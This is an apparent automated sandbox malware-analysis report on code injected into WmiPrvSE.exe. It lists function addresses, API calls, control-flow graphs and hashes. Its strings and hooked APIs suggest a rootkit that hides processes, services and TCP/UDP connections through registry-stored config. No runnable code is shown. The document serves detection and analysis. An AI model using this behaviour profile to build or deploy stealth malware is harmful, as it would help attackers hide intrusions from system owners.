                                                                  • Part of subcall function 000001F5A9683D58: StrCmpNIW.KERNELBASE(?,?,?,000001F5A968272E), ref: 000001F5A9683D70
                                                                  • Part of subcall function 000001F5A9683CA4: GetModuleHandleW.KERNEL32(?,?,?,?,?,000001F5A9683837), ref: 000001F5A9683CB2
                                                                  • Part of subcall function 000001F5A9683CA4: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001F5A9683837), ref: 000001F5A9683CE0
                                                                  • Part of subcall function 000001F5A9683CA4: VirtualProtectEx.KERNEL32(?,?,?,?,?,000001F5A9683837), ref: 000001F5A9683D02
                                                                  • Part of subcall function 000001F5A9683CA4: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001F5A9683837), ref: 000001F5A9683D1D
                                                                  • Part of subcall function 000001F5A9683CA4: VirtualProtectEx.KERNEL32(?,?,?,?,?,000001F5A9683837), ref: 000001F5A9683D3E
                                                                • CreateThread.KERNELBASE ref: 000001F5A9683867
                                                                  • Part of subcall function 000001F5A9681E38: GetCurrentThread.KERNEL32 ref: 000001F5A9681E43
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                • String ID:
                                                                • API String ID: 1683269324-0
                                                                • Opcode ID: c4f51b7847a1f98021941fe9320a796c4d22ffdd32b47b35cb34ea0b9caf4340
                                                                • Instruction ID: 43e42d36b8573717c8116ff8a6dd59fcd96d9bb46e2cbc12d3ddd7db593919fd
                                                                • Opcode Fuzzy Hash: c4f51b7847a1f98021941fe9320a796c4d22ffdd32b47b35cb34ea0b9caf4340
                                                                • Instruction Fuzzy Hash: F71140BC610E3345FB64A720E449BF92AB3AF54385F50B3399B07439A5DF78C0358601
                                                                Function 000001F5A9683D58 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 18 1f5a9683d58-1f5a9683d63 19 1f5a9683d7d-1f5a9683d84 18->19 20 1f5a9683d65-1f5a9683d78 StrCmpNIW 18->20 20->19 21 1f5a9683d7a 20->21 21->19
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $LMX
                                                                • API String ID: 0-1475574623
                                                                • Opcode ID: b4da42a706a87f17c2f2cfefd8112183663bfed5671a2c80788db3ec5171a75c
                                                                • Instruction ID: b28281dc9a93e7a59c18d31d09aae87c825c50d882c57effe7d94c8ad05cf78a
                                                                • Opcode Fuzzy Hash: b4da42a706a87f17c2f2cfefd8112183663bfed5671a2c80788db3ec5171a75c
                                                                • Instruction Fuzzy Hash: 41D05E38311E578AEF54AFA188C0AF02B729F04714F88A2358A0607100DF5989ADC750
                                                                Function 000001F5A9652C98 Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000003.1588342977.000001F5A9650000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F5A9650000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_3_1f5a9650000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: LibraryLoad
                                                                • String ID:
                                                                • API String ID: 1029625771-0
                                                                • Opcode ID: c8def6fedd9c5836e92fabc2dd1894f4ed18aaca8c094442d268cbce729e04a9
                                                                • Instruction ID: c5b317edb167a8703877f44c046b5b2e6377dfea13685574367ef2a65a746f2b
                                                                • Opcode Fuzzy Hash: c8def6fedd9c5836e92fabc2dd1894f4ed18aaca8c094442d268cbce729e04a9
                                                                • Instruction Fuzzy Hash: 0A91167AB01A6287EB648F25E540BBDB3A2FF54B94F5492359F4B07784DA38D862C700
                                                                Function 000001F5A9681BC0 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 000001F5A9681724: GetProcessHeap.KERNEL32 ref: 000001F5A968172F
                                                                  • Part of subcall function 000001F5A9681724: HeapAlloc.KERNEL32 ref: 000001F5A968173E
                                                                  • Part of subcall function 000001F5A9681724: RegOpenKeyExW.ADVAPI32 ref: 000001F5A96817AE
                                                                  • Part of subcall function 000001F5A9681724: RegOpenKeyExW.ADVAPI32 ref: 000001F5A96817DB
                                                                  • Part of subcall function 000001F5A9681724: RegCloseKey.ADVAPI32 ref: 000001F5A96817F5
                                                                  • Part of subcall function 000001F5A9681724: RegOpenKeyExW.ADVAPI32 ref: 000001F5A9681815
                                                                  • Part of subcall function 000001F5A9681724: RegCloseKey.ADVAPI32 ref: 000001F5A9681830
                                                                  • Part of subcall function 000001F5A9681724: RegOpenKeyExW.ADVAPI32 ref: 000001F5A9681850
                                                                  • Part of subcall function 000001F5A9681724: RegCloseKey.ADVAPI32 ref: 000001F5A968186B
                                                                  • Part of subcall function 000001F5A9681724: RegOpenKeyExW.ADVAPI32 ref: 000001F5A968188B
                                                                  • Part of subcall function 000001F5A9681724: RegCloseKey.ADVAPI32 ref: 000001F5A96818A6
                                                                  • Part of subcall function 000001F5A9681724: RegOpenKeyExW.ADVAPI32 ref: 000001F5A96818C6
                                                                • SleepEx.KERNELBASE ref: 000001F5A9681BDB
                                                                  • Part of subcall function 000001F5A9681724: RegCloseKey.ADVAPI32 ref: 000001F5A96818E1
                                                                  • Part of subcall function 000001F5A9681724: RegOpenKeyExW.ADVAPI32 ref: 000001F5A9681901
                                                                  • Part of subcall function 000001F5A9681724: RegCloseKey.ADVAPI32 ref: 000001F5A968191C
                                                                  • Part of subcall function 000001F5A9681724: RegOpenKeyExW.ADVAPI32 ref: 000001F5A968193C
                                                                  • Part of subcall function 000001F5A9681724: RegCloseKey.ADVAPI32 ref: 000001F5A9681957
                                                                  • Part of subcall function 000001F5A9681724: RegOpenKeyExW.ADVAPI32 ref: 000001F5A9681977
                                                                  • Part of subcall function 000001F5A9681724: RegCloseKey.ADVAPI32 ref: 000001F5A9681992
                                                                  • Part of subcall function 000001F5A9681724: RegCloseKey.ADVAPI32 ref: 000001F5A968199C
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: CloseOpen$Heap$AllocProcessSleep
                                                                • String ID:
                                                                • API String ID: 948135145-0
                                                                • Opcode ID: c734f778ebace249d11891a89cc237880a62daafbc4a5d84d80dcf23aa596c60
                                                                • Instruction ID: d8c7286c65cf9e935b76d6461519feafe78fa224f3ea176f193de50106bf97b8
                                                                • Opcode Fuzzy Hash: c734f778ebace249d11891a89cc237880a62daafbc4a5d84d80dcf23aa596c60
                                                                • Instruction Fuzzy Hash: AC31DFB9200E2341FB509B22D5E43F957B6AF88BD4F16A6319F0B97696DE14C4708391

                                                                Non-executed Functions

                                                                Function 000001F5A9682DDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 252stringlibraryloaderCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 209 1f5a9682ddc-1f5a9682e55 211 1f5a9683160-1f5a9683183 209->211 212 1f5a9682e5b-1f5a9682e61 209->212 212->211 213 1f5a9682e67-1f5a9682e6a 212->213 213->211 214 1f5a9682e70-1f5a9682e73 213->214 214->211 215 1f5a9682e79-1f5a9682e89 GetModuleHandleA 214->215 216 1f5a9682e9d 215->216 217 1f5a9682e8b-1f5a9682e9b GetProcAddress 215->217 218 1f5a9682ea0-1f5a9682ebe 216->218 217->218 218->211 220 1f5a9682ec4-1f5a9682ee3 StrCmpNIW 218->220 220->211 221 1f5a9682ee9-1f5a9682eed 220->221 221->211 222 1f5a9682ef3-1f5a9682efd 221->222 222->211 223 1f5a9682f03-1f5a9682f0a 222->223 223->211 224 1f5a9682f10-1f5a9682f23 223->224 225 1f5a9682f33 224->225 226 1f5a9682f25-1f5a9682f31 224->226 227 1f5a9682f36-1f5a9682f3a 225->227 226->227 228 1f5a9682f4a 227->228 229 1f5a9682f3c-1f5a9682f48 227->229 230 1f5a9682f4d-1f5a9682f57 228->230 229->230 231 1f5a968303d-1f5a9683041 230->231 232 1f5a9682f5d-1f5a9682f60 230->232 235 1f5a9683152-1f5a968315a 231->235 236 1f5a9683047-1f5a968304a 231->236 233 1f5a9682f72-1f5a9682f7c 232->233 234 1f5a9682f62-1f5a9682f6f call 1f5a9681a30 232->234 240 1f5a9682f7e-1f5a9682f8b 233->240 241 1f5a9682fb0-1f5a9682fba 233->241 234->233 235->211 235->224 237 1f5a968305b-1f5a9683065 236->237 238 1f5a968304c-1f5a9683058 call 1f5a9681a30 236->238 243 1f5a9683095-1f5a9683098 237->243 244 1f5a9683067-1f5a9683074 237->244 238->237 240->241 246 1f5a9682f8d-1f5a9682f9a 240->246 247 1f5a9682fea-1f5a9682fed 241->247 248 1f5a9682fbc-1f5a9682fc9 241->248 253 1f5a96830a5-1f5a96830b2 lstrlenW 243->253 254 1f5a968309a-1f5a96830a3 call 1f5a9681cc0 243->254 244->243 252 1f5a9683076-1f5a9683083 244->252 255 1f5a9682f9d-1f5a9682fa3 246->255 250 1f5a9682fef-1f5a9682ff9 call 1f5a9681cc0 247->250 251 1f5a9682ffb-1f5a9683008 lstrlenW 247->251 248->247 256 1f5a9682fcb-1f5a9682fd8 248->256 250->251 263 1f5a9683033-1f5a9683038 250->263 260 1f5a968300a-1f5a9683019 call 1f5a9681cf8 251->260 261 1f5a968301b-1f5a968302d call 1f5a9683d58 251->261 259 1f5a9683086-1f5a968308c 252->259 265 1f5a96830b4-1f5a96830c3 call 1f5a9681cf8 253->265 266 1f5a96830c5-1f5a96830cf call 1f5a9683d58 253->266 254->253 271 1f5a96830d6-1f5a96830e1 254->271 255->263 264 1f5a9682fa9-1f5a9682fae 255->264 257 1f5a9682fdb-1f5a9682fe1 256->257 257->263 267 1f5a9682fe3-1f5a9682fe8 257->267 270 1f5a968308e-1f5a9683093 259->270 259->271 260->261 260->263 261->263 275 1f5a96830d2-1f5a96830d4 261->275 263->275 264->241 264->255 265->266 265->271 266->275 267->247 267->257 270->243 270->259 278 1f5a96830e3-1f5a9683103 call 1f5a96946c0 271->278 279 1f5a968314c-1f5a9683150 271->279 275->235 275->271 285 1f5a9683105-1f5a9683123 call 1f5a96946c0 278->285 286 1f5a9683126-1f5a9683129 278->286 279->235 285->286 286->279 288 1f5a968312b-1f5a9683149 call 1f5a96946c0 286->288 288->279
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: lstrlen$FileHandleNameProcess$AddressCloseFindImageModuleOpenPathProc
                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                • API String ID: 3153948470-3850299575
                                                                • Opcode ID: af941bbd925a70d38f6486cb6656ede44cc86a8b1b8ec346851b17c5dcdcb7d3
                                                                • Instruction ID: 1ba108010db43734c0dcef9b5a5edba691ac314f21ac6bebab9cf082a9187ebd
                                                                • Opcode Fuzzy Hash: af941bbd925a70d38f6486cb6656ede44cc86a8b1b8ec346851b17c5dcdcb7d3
                                                                • Instruction Fuzzy Hash: ACA17F7A220EA681EB549F25D540BF96BB6FF44BC4F50A226EF4A57798DE34CC60C340
                                                                Function 000001F5A9688280 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                • String ID:
                                                                • API String ID: 3140674995-0
                                                                • Opcode ID: de5a275b32af45d115b24bcd90eb4bafcc35652886522a6b7213aca4867b91de
                                                                • Instruction ID: ba1c8e2f2bae9b52221b521932163d09426327ea552598f499eb1170f5199f36
                                                                • Opcode Fuzzy Hash: de5a275b32af45d115b24bcd90eb4bafcc35652886522a6b7213aca4867b91de
                                                                • Instruction Fuzzy Hash: 0A316F7A204F928AEB609F60E8503ED7371FB84748F44522ADB5E4BB98DF38C558C710
                                                                Function 000001F5A968CE44 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                • String ID:
                                                                • API String ID: 1239891234-0
                                                                • Opcode ID: 392e704d5fe8c3ada142f8273b0c6ad9d4e3e3ebca39cb4030b279e164533c73
                                                                • Instruction ID: 265af7fa073f63cced41a4d1e94f6281b8e964120e5e1d5d0e8d733dbf0c3657
                                                                • Opcode Fuzzy Hash: 392e704d5fe8c3ada142f8273b0c6ad9d4e3e3ebca39cb4030b279e164533c73
                                                                • Instruction Fuzzy Hash: C0315E3A214F9285EB608F25E8403EE77B1FB89794F545225EB9E47B98DF38C155CB00
                                                                Function 000001F5A96814A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Heap$Process$Free
                                                                • String ID:
                                                                • API String ID: 3168794593-0
                                                                • Opcode ID: f3e0de64b65f5cd8790649c543bda011a5d3b766c0670fbc4556caf0ac72903c
                                                                • Instruction ID: adce5e3564c6a7d5c25b20aecfcf905a1bd8433ecf91a4a6759b673bab9f0196
                                                                • Opcode Fuzzy Hash: f3e0de64b65f5cd8790649c543bda011a5d3b766c0670fbc4556caf0ac72903c
                                                                • Instruction Fuzzy Hash: EA015736610FA2C6EB04DF6AE8081ADB7B2FB89FC9B095535DB5A47725CE34D062C740
                                                                Function 000001F5A9687E60 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                • String ID:
                                                                • API String ID: 2933794660-0
                                                                • Opcode ID: 8df48a55f94b131e811e19ece6cc07fdaf9e855ab457e00368d898171dffc6f8
                                                                • Instruction ID: b8473ececef532b8b29e6d1625c697b9a073648e87b1f68ae08b681166ed28a6
                                                                • Opcode Fuzzy Hash: 8df48a55f94b131e811e19ece6cc07fdaf9e855ab457e00368d898171dffc6f8
                                                                • Instruction Fuzzy Hash: FA111C3A714F128AEF008B60E8943E833B4FB19798F441A31DB6E47BA8DF78C1648340
                                                                Function 000001F5A9694048 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: ExceptionRaise_clrfp
                                                                • String ID:
                                                                • API String ID: 15204871-0
                                                                • Opcode ID: 3fb59a9a99bc2d764a2805e064b6feaa44c8abd426add4eecb44b81d3d10b4c7
                                                                • Instruction ID: 37250cea008fefea2f8e2036e3f9973f7bb6ce005b1595a0860a632816df0cb3
                                                                • Opcode Fuzzy Hash: 3fb59a9a99bc2d764a2805e064b6feaa44c8abd426add4eecb44b81d3d10b4c7
                                                                • Instruction Fuzzy Hash: 59B14D77210BA68BEB15CF2DC8463AC7BB1F744B88F159A21DB5A877A4CB39C461C740
                                                                Function 000001F5A96521DC Relevance: 2.8, Strings: 2, Instructions: 252COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000003.1588342977.000001F5A9650000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F5A9650000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_3_1f5a9650000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .CRT$XIZ$ta$6
                                                                • API String ID: 0-322923984
                                                                • Opcode ID: af941bbd925a70d38f6486cb6656ede44cc86a8b1b8ec346851b17c5dcdcb7d3
                                                                • Instruction ID: 4865671cf4500982147bc944788eb6f09799dcbcd743d682cf2d1a11fe280523
                                                                • Opcode Fuzzy Hash: af941bbd925a70d38f6486cb6656ede44cc86a8b1b8ec346851b17c5dcdcb7d3
                                                                • Instruction Fuzzy Hash: A0A17F7A210EA682EB588F25D4507F963B6FB44B94F446226EF4A53798EF34CDA0C740
                                                                Function 000001F5A9663448 Relevance: 1.7, APIs: 1, Instructions: 227COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000003.1588342977.000001F5A9650000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F5A9650000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_3_1f5a9650000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: _clrfp
                                                                • String ID:
                                                                • API String ID: 3618594692-0
                                                                • Opcode ID: 3fb59a9a99bc2d764a2805e064b6feaa44c8abd426add4eecb44b81d3d10b4c7
                                                                • Instruction ID: 4ff693c7a892930f9efb3611fa51ed2429301f1544fea429641e286efdb14ecb
                                                                • Opcode Fuzzy Hash: 3fb59a9a99bc2d764a2805e064b6feaa44c8abd426add4eecb44b81d3d10b4c7
                                                                • Instruction Fuzzy Hash: 04B15D77200BD58BEB19CF29C8867AC7BB1F784B48F149A25DB5A877A4CB39C461C700
                                                                Function 000001F5A968D880 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2ef49b89a962db8d8e320cc7c94e283ffa9c3c105420e2d770fa47da1115c244
                                                                • Instruction ID: 94910206100de8bec8189ea12e41015661ab9d1d340f3f7027b03400d909060b
                                                                • Opcode Fuzzy Hash: 2ef49b89a962db8d8e320cc7c94e283ffa9c3c105420e2d770fa47da1115c244
                                                                • Instruction Fuzzy Hash: 4151C436700AA185EB209B72E8547EE7FF6FB447D4F149225EF5A27A99CA38C411C700
                                                                Function 000001F5A965CC80 Relevance: .1, Instructions: 149COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000003.1588342977.000001F5A9650000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F5A9650000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_3_1f5a9650000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cccc5a6f2ca28c5c2185d4e81174855bb5d6027bbc1350ce747bbf740284351b
                                                                • Instruction ID: c4d33393a373285f937e52fcd94ecd0e903e21a48e021fd92c6bbe65ab2da745
                                                                • Opcode Fuzzy Hash: cccc5a6f2ca28c5c2185d4e81174855bb5d6027bbc1350ce747bbf740284351b
                                                                • Instruction Fuzzy Hash: EE51D436700BA195FB209F72A8406EA7BB6FB44BD8F145225EF5A67B95DB38C421C700
                                                                Function 000001F5A9663290 Relevance: .0, Instructions: 32COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000003.1588342977.000001F5A9650000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F5A9650000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_3_1f5a9650000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 81c9ccf06db882c3359a48238ba82c88040a2c559c1c74743137ffd670966646
                                                                • Instruction ID: 54726d5d4436734cdeb4f11f492d78ba63180bf024bda3f50cd2d4ea3dd7aef7
                                                                • Opcode Fuzzy Hash: 81c9ccf06db882c3359a48238ba82c88040a2c559c1c74743137ffd670966646
                                                                • Instruction Fuzzy Hash: FAF062B57146A58ADFA88F2CA80376977E1F7583C0F909539E78A83F04D73C80A08F04
                                                                Function 000001F5A9681724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                • String ID: SOFTWARE\$LMXconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                • API String ID: 2135414181-4142111819
                                                                • Opcode ID: 0f6af3d613b5716d2d939483ea722be53918ea7012dfc8c5f10971523ef45b65
